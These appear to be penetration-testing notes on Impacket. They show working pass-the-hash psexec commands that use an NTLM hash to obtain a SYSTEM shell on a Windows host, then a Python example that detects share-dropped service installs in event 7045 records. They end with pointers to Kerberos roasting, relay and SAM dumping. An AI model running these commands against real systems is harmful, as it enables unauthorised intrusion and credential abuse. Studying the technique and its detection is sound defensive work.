Impacket
Pass-the-Hash
psexec
psexec uploads a service executable to a writable share, registers it as a service, and starts it, so it requires write access to a share. If no argument is specified at the end of the command, it runs cmd.exe by default, giving us a SYSTEM shell:
# SYSTEM shell
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212
...
C:\Windows\system32> whoami
nt authority\system
# Specify a command
$ impacket-psexec -hashes :7a38310ea6f0027ee955abed1762964b Administrator@192.168.233.212 <command>
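Because this technique leaves behind a freshly registered service whose binary arrived over a share, the service-install event is the natural place to look for it from the defender's side. The following is an added detection example, not part of these notes or of Impacket: it scans constructed Windows System-log 7045 ("A service was installed in the system") records with hypothetical values and flags services whose binary sits at the root of a default administrative share (ADMIN$ or C$, assuming C: is the system drive).

```python
import ntpath

# Constructed 7045 records for this example; the values are hypothetical and
# not taken from a real host or from Impacket's own behaviour.
SAMPLE_EVENTS = [
    {"ServiceName": "WaaSMedicSvc",
     "ImagePath": r"%SystemRoot%\System32\svchost.exe -k wusvcs -p",
     "AccountName": "LocalSystem"},
    {"ServiceName": "kXyTqWpL",
     "ImagePath": r"%SystemRoot%\kXyTqWpL.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "BackupAgent",
     "ImagePath": r'"C:\Program Files\Backup\agent.exe" --service',
     "AccountName": r"NT AUTHORITY\NetworkService"},
]

# Directories exposed by default administrative shares (assumes C: is the system drive).
SHARE_ROOTS = {r"c:\windows": "ADMIN$", "c:": "C$"}

def binary_path(image_path):
    """Return the executable named in a service ImagePath, dropping its arguments."""
    p = image_path.strip()
    if p.startswith('"'):
        p = p[1:p.index('"', 1)]
    else:
        p = p.split(" ", 1)[0]
    return p.replace("%SystemRoot%", r"C:\Windows").replace("%windir%", r"C:\Windows")

def classify_service_install(event):
    """Return the reasons a 7045 record looks like a share-dropped service (empty if none)."""
    binary = binary_path(event["ImagePath"])
    parent = ntpath.dirname(binary).rstrip("\\").lower()
    share = SHARE_ROOTS.get(parent)
    reasons = []
    if share:
        reasons.append(f"binary placed directly in the {share} share root ({ntpath.dirname(binary)})")
    if event.get("AccountName", "").lower() == "localsystem":
        reasons.append("service runs as LocalSystem")
    if ntpath.splitext(ntpath.basename(binary))[0] == event["ServiceName"]:
        reasons.append("service name is just the binary name")
    # Only the share-root location triggers an alert; the other signals raise confidence.
    return reasons if share else []

def flag_service_installs(events):
    """Return (ServiceName, reasons) for every record that classifies as suspicious."""
    flagged = [(e["ServiceName"], classify_service_install(e)) for e in events]
    return [(name, reasons) for name, reasons in flagged if reasons]

if __name__ == "__main__":
    for name, reasons in flag_service_installs(SAMPLE_EVENTS):
        print(name, "->", "; ".join(reasons))
```

Legitimate installers rarely drop their service binary straight into C:\Windows or the drive root, so this rule is narrow enough to review by hand, but pair it with an allowlist of known deployment tools before alerting on it.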
AS-REPRoasting
See how to use impacket-GetNPUsers here.
Kerberoasting
See how to use impacket-GetUserSPNs here.
NTLMv2 Relay
See how to use impacket-ntlmrelayx here.
Local SAM Dump
See how to use impacket-secretsdump here.